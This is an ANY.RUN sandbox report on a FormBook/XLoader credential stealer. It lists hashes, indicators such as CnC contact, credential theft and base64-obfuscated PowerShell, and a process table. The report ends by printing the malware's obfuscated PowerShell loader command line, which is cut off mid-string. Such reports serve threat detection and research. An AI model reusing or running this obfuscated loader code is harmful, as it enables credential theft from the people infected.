Malware analysis JOU23013126.exe Malicious activity | ANY.RUN

Add for printing

File name:	JOU23013126.exe
Full analysis:	https://app.any.run/tasks/49a6c919-b1a8-4b6b-b3ab-efed6c8b3749
Verdict:	Malicious activity
Threats:	FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. Spyware is a stealth form of malware whose primary objective is to gather sensitive information, such as personal data, login credentials, and financial details, by monitoring user activities and exploiting system vulnerabilities. Spyware operates secretly in the background, evading detection while transmitting collected data to cybercriminals, who can then use it for malicious purposes like identity theft, financial fraud, or espionage. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	December 12, 2023, 13:30:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	formbook xloader stealer spyware
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:	2F3EE0A5E9AAD3010204C7A547761E13
SHA1:	DB3BB0FA734A9F555E01D2011DC8E626ABE9AAA6
SHA256:	3E3AC1D0D519E933394B3C728713B102B9CA63D57BC2427591F4FCCF0C9C012A
SSDEEP:	24576:1BuJgC86f6W5vbMhvzavIs7oLCEACHHl2k95XVXZBSq9uq7G3QK:LuJgC86f6W5vbMhvzavIs7oLC3CHHl27

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Drops the executable file immediately after the start
  - JOU23013126.exe (PID: 2784)
- Connects to the CnC server
  - explorer.exe (PID: 1944)
- FORMBOOK has been detected (SURICATA)
  - explorer.exe (PID: 1944)
- Steals credentials
  - verclsid.exe (PID: 2892)
- FORMBOOK has been detected (YARA)
  - verclsid.exe (PID: 2892)
- Actions looks like stealing of personal data
  - verclsid.exe (PID: 2892)
SUSPICIOUS
- Reads the Internet Settings
  - JOU23013126.exe (PID: 2784)
  - wab.exe (PID: 2652)
  - verclsid.exe (PID: 2892)
- Base64-obfuscated command line is found
  - powershell.exe (PID: 2864)
- Starts POWERSHELL.EXE for commands execution
  - powershell.exe (PID: 2864)
  - JOU23013126.exe (PID: 2784)
- Application launched itself
  - powershell.exe (PID: 2864)
- Checks Windows Trust Settings
  - wab.exe (PID: 2652)
- Reads security settings of Internet Explorer
  - wab.exe (PID: 2652)
- Adds/modifies Windows certificates
  - wab.exe (PID: 2652)
- Reads settings of System Certificates
  - wab.exe (PID: 2652)
- Process drops SQLite DLL files
  - verclsid.exe (PID: 2892)
INFO
- Reads the computer name
  - JOU23013126.exe (PID: 2784)
  - wab.exe (PID: 2652)
- Create files in a temporary directory
  - JOU23013126.exe (PID: 2784)
  - wab.exe (PID: 2652)
  - verclsid.exe (PID: 2892)
- Checks supported languages
  - JOU23013126.exe (PID: 2784)
  - wab.exe (PID: 2652)
- Creates or changes the value of an item property via Powershell
  - powershell.exe (PID: 2864)
- Checks proxy server information
  - wab.exe (PID: 2652)
  - verclsid.exe (PID: 2892)
- Reads the machine GUID from the registry
  - wab.exe (PID: 2652)
- Manual execution by a user
  - verclsid.exe (PID: 2892)
- Creates files or folders in the user directory
  - verclsid.exe (PID: 2892)
- Drops the executable file immediately after the start
  - verclsid.exe (PID: 2892)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2014:05:11 22:03:33+02:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit
PEType:	PE32
LinkerVersion:	6
CodeSize:	24064
InitializedDataSize:	141824
UninitializedDataSize:	2048
EntryPoint:	0x31ff
OSVersion:	4
ImageVersion:	6
SubsystemVersion:	4
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1760

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#olietanken Odontologens chester saarede #>$Missionens = """Te;NoFHeuBun PcPatPii HoBun B SuVUnAEiRsn5 T3 S Cl{Ve Bl F In SipAbaKlrteahomRu( V[DoSKotVsrTuiMan RgIk]Fu`$TaM Fo RnCrsReuHonMeeRanPisDr)Un;Za C`$ SFFirFeeAnkInv FeganDesNatRalHjlbleLirFr8Ca Di=Co Sc`$FeMCooEnnassSsuUnnPreManFosSm.StLSkeCinScgDet AhGr;un Kr Un Ti Eg`$GovVuaDenGodQusLik FeTilTilUneUtnPoe KsPecUneBetSka btvaeKos A0Pr Dr=Ov CNOve TwLe-baODibMijSmeAlcFltGo UsbHyyVet TeIn[Lf]Ti Mu( A`$ QFSkranePrkVevPseInnEms Lt AlTrlUneDerCe8Fr Be/Co Bo2de)Un;Pr Ma`$ SROmyFlnTrkWonRei fnTjgEfeStnKnsAc=Ep'ClSFjUBa'Ar+ D'HoBDuSJoTInRSuICeN SGAc'Pe;Ya Da Bi f SkFHvo Ir F(Ki`$TrK CoElm SpRarineKasGrsFoiBooBanBosTa=Di0 S; O ce`$VaKDeo DmrepUnrAme AsFaspriStoFen IsPu C- Tl BtCy Re`$reFLyrTreMekunvMueUnnJasSttCol SlUieklr I8An;Dr Au`$HyKPao Emprpmir QeFosOvsGriSkoQunPas C+Sn=Ob2al)Le{Ed E Un Sc Tr Di A Ov S`$PovplaPunMadSmsSpkKre Bl SlIneUnnJaeHysKecAneLotStaAltLeeRusPh0Be[Ti`$CaKSconrmPrpaprFoeCusRas BispoArnBesLi/Sp2Ma]fr M= F Kr[ ScStoOvnKrvAdeWhr rtPh]Hi: s:TiTVaoAmB Dy AtPheNo(em`$PeMSroNonKlsCruRinUne LnStsSi.El`$FjRReyBenUdkEjnAliUlnMigBeeManBisPh.SuIAlntiv AoBlkBeeBh(Po`$ FK EoNam Cp Lr IeFos PsSeiStoVanens P,Ps Di2Sh)Ha,Bi Im1Kr6Ka)Pa;Br Ho Ti`$PavHeaPin IdResStkRoeSpl SlEneStnReeCos Ac Ke yt NadetUnePhs N0Ge[Ma`$PoKAboGimPlpRerPaeKesjasGriSto GnPisOv/Uf2Co]At In= g UhLaeYdr obSpiStvMooSkrAfiFotwiydr8Cr Kn`$KnvFoaTrn DdAgs BkSke llSal beRnnleeHys KcpaeBetPraAstadeMes I0Sl[So`$ DKSno RmAnp Trtre SsBisMeiChoGrnKosMa/Co2 S]Ov Ab7 E2Ch;Ph Ud H h Da}Ar K[KaShatCrrIniBenUdg A]Ta[UdSPryGrsTrt peOrmPh.SaTSte RxNitKl.flE GnEvcDeoLudeliBenUng A] E:Wi: PA RSTiCakITrIpe.UnGcleBit PSdotHoraaiRenLyg R(wo`$ KvIoaOmnPodPasSek BeTelPelPueUdnLue BsDrcTheaftWaaDatSpedesTo0 H)un;Bi}Tu`$StR Po CpUdiSynMeeSksRusFu2Ab2De0st0 U=GaV CABaRMa5Sa3Ju Ko'Up1BiB R3Ae1Va3unBbe3UnC F2FaDUd2He5Ge6Sk6Sp2KrCBe2Kj4Fo2fr4Cu'We;Un`$TiR So RpRaiMin UefosBysTr2Ro2To0 B1Ge=CaVPeAFlROu5 E3Bu Ko'Sm0 F5Si2Fr1Pa2TaBHj3ImA H2 m7An3 NBMo2Pe7au2RuERh3FrCBa6sy6No1RaFBu2Te1Hu2 U6ga7TiB M7CyAPa6Fu6Sm1KyD s2Mi6Pa3 FBTo2Na9di2 SEsa2WhD S0Re6Sd2Sh9Sk3OoCGu2Ko1Dr3OrEUd2 AD K0Un5Sk2BrDSk3CoC T2pu0Ra2ti7Ch2 SCSt3AlBIo' P;Lo`$SkRUdoBopReiUnnsueDesPrsDe2De2 H0Fo2 E=tuVKoAKnR P5Ky3Sa Kl'Fo0SuFSo2RoDKi3AnCSp1 S8No3 SAtr2Pr7Gr2FoB B0Op9An2 GC S2 DCKa3 DA t2BiDBi3PaBPr3 GBRe'Ex;Pr`$UnRRooCopZeifanOveWasStsSu2 I2Hd0Fo3Pa=OvVOxAPuR P5Od3Sv K'Se1UdBMo3Pl1Bu3ViBun3 FCpr2UdDAr2Se5Mi6 E6Tr1EuA B3udDRe2Ja6 D3SkCUn2Ju1Wa2Vr5Re2 ZD A6 S6Ps0Un1 F2St6Di3 FCFr2AuDAr3AuAFl2La7No3De8 M1PoBAv2GeDDe3StABi3FoEYu2 S1Sk2PsBrd2 dDPl3OrBAc6Di6Xe0Fo0 K2 S9En2La6Fo2StCDe2Se4St2ReDFl1MeA T2HiDJy2AtEDe'No;Ci`$SkRDeoRdpKuiSpn AeCusDesFo2Sk2Af0 D4 F= GVStAdiRGr5Hi3Ra Yd'fo3IsBQu3 EC D3 MAFl2 h1At2Ma6Ju2AbFFo'So;Co`$UdRSco ApTeiTonKuePrsInsKa2Ty2 T0Su5Ej=flVTrAUrRAm5Sk3Ur Fo'Mi0 DF P2MaDUl3 PCSt0Ph5Bu2 K7 A2 SC A3 RDUn2Do4Su2UdDRo0Mo0Ev2Sn9Bo2Al6To2FlC T2Gr4 R2CrDsa'Ik;Ro`$SvRBeoAnpBoiIdn se FsEssSk2 P2 a0 P6Ma=UnVMoAOrRJu5El3Sp Di'Ke1 HA A1SuCMo1osBAt3Ud8Fr2riDSp2PuBAg2Tr1To2Ma9An2Fo4Ge0 F6Ca2Ki9Ba2Pa5Ke2HaDNu6 s4No6Ro8Fa0Sy0Ge2Av1Fo2SpCDo2 WDHa0ReA F3 O1Tr1PrBIr2Pu1Fa2NoFAx6No4No6So8Ap1Ma8Gn3CrDFo2UnASa2Gi4 U2 C1Ne2ArBTe'Hj; F`$ FRTuo VpklisinOveMasSasFo2 B2Bl0 h7Wo=CoVReAPlRNo5Be3Kl A'Tr1ObAKr3 PDCz2Mo6Lr3EnCou2Sc1Ca2An5 C2TeDCo6In4In6Ga8Ox0An5 M2 O9Om2Aa6St2no9Sh2 GFBj2UnDAa2StCno' R; H`$StRAsoLapEliAlnDeeBasVisRe2cl2 E0Ch8Ha=MyVDuA GRIn5 S3Fr Mo'De1FaAAk2HoDSt2 fETh2Ba4Se2DoDOt2CoBAn3NiCPo2BiDKe2 vC S0 SC I2GaD T2Ma4vi2trDTi2MoFCh2 A9 E3trCLe2 TDFr'Ra;Gl`$FlRMooDepLaiPenVeeRksRusNv2bl2Op0 U9Qu=WeVPeASuRMa5Ch3Te Ki'He0Uo1Od2Ve6Ne0Af5Re2TaD U2Mo5Me2Vr7Ol3BoA P3He1Fi0Pr5Fo2Fe7Sp2PoCSt3SqDNa2Re4 M2HeDLa'rh;Pa`$ PMBeiWecKerTroOvcSuoBapSkiSoe UsKo0De=GaVNaAReRPe5Da3Co Ni'Ci0Ud5Pi3Co1Py0MoCFr2QuDBl2Pr4gi2UdDEn2drFAf2 N9Ac3SrCLi2EsDUd1WaCOs3Aa1Mo3 P8He2NoDKv'bd;Wo`$KoMPhiEkcUir CoUncStoUnpOsiFreChsAk1 A=WoVTeATeRFi5En3 p Pe'Se0ScB V2Po4Co2Hi9Me3StB O3PoBph6Ko4Na6Ce8co1Sk8La3HuDFo2BrASi2Ba4St2Po1Ba2AaBSt6 S4Bo6bu8St1WoB I2UgDIm2Fo9Fo2Sa4Un2StDKl2DeCFo6Ir4Sa6Re8De0Bo9Di2un6Re3 fBAs2Su1Oo0HoB f2me4Au2Om9Un3StB R3StBSa6 T4 C6Xi8In0sp9 R3 SDIn3DoC T2Pe7Gr0TrB A2 F4Er2Pe9 B3PrBRe3DoBEl'Ma;Kr`$diMDai PcPer SoDacFroBapHaiIreLasRa2le=ChVOrAAsR O5 M3Fi Oi'Un0 H1Di2Hy6Fo3 PEIc2St7Sr2Fr3Su2YiDUp'Br;Un`$FoMIniHycMarTeoFrcTao BpraiHeeSusMy3Th=IdVNoACuRIn5Ek3Ma Po'Je1No8St3OpDFo2UnABa2Op4Un2An1Ka2BrBGa6Am4Ke6 O8Sm0Ar0St2Ko1 A2PrCGi2OpDSo0UnA s3 S1Fo1 HB B2 R1 N2KaF P6 T4Pa6em8pt0li6 F2 ADBo3 AF S1ElBAv2 E4Re2 S7In3SeC B6Pr4So6Su8Fe1 JEaw2 S1ko3 RAOu3PuCPa3KeDBj2Af9Ou2 F4De' S; A`$ CMMeiBac Rr Ho AcFioShpCoiAfeHes S4 G=KnVTeAObR I5Re3Fa Di'Un1MiEPo2 D1va3 VAFo3 HCCe3DaDAg2ib9St2Un4Hy0In9Bs2Ri4No2Se4 H2 s7 B2BoBRe'Ma; V`$RaMIsiRecPrrDeoRecProUrpBliHaeCosCo5 S= CVKrAUtRGl5Pa3St Oc'In2Pa6tr3 TCCi2 OCSi2Di4Ob2Jo4Ps'De;Af`$ KMHii PcUrrUroBuc poAfpVaiDaeTisRe6Ej=UnV UAOvRTz5An3Tr mi'Mi0 S6Hy3ReCDe1 S8le3FeAKo2In7mr3HaCpl2JuDPo2 FBIt3MaCGr1PrELo2Ba1Be3CuALa3 BCNy3ReDDi2Se9 S2Ka4 S0Ti5Hu2BaD J2Un5Sy2Po7Ma3ReAUr3 U1hu'Lo;Ph`$SmMmei UcSkrExoRucSho TpIniSoe DsGi7Di=KeVknA SRFo5En3Eu Bu'At0Fe1Sa0LaDGi1Ro0 B'ud;om`$ EMpaiInc RrSvosecjaoJep CiTeeRisVe8Su=BoVTeAPrRNe5De3Su Kv'Is1Ri4 S'Em;al`$PiCExy VtRoo UpPaa DhEkgAaodiuBus N1Pr7Mi6Fi=IsV TATaRGi5Cl3 P So'Ov1hoDLa1BaBsi0skDFo1UnA P7ImBSm7suATh'Up;Ha`$LePUnuPrbLiiUnaOvnDr=ReVSpAosRIm5Ve3 T Ru'Ru0paBUn2Re9Pa2Av4In2un4Ja1BeFGy2Le1Sy2Ti6No2EpCBe2Ta7br3BeF p1Af8Pa3StA V2Sa7Co2LiBPh0Ve9fa'Tr;MsfDeu Hn Cc Gt Ci FoNenCh CofRek MpMe Al{rePCha RrGeaGam V Da( I`$Rev AaBin PdHjsspkKieRelErlMaeWon GenasHanAntDoi PpSpsSpaDrlPrmKoiPhsFitCh,ud Ki`$seS TaFor EkWeo FmprePrrDa) I In B ti Ex De;Un`$PeB TeXytDio MnMabRal Na Nn Sd PeLirSknVeeKa0Sa 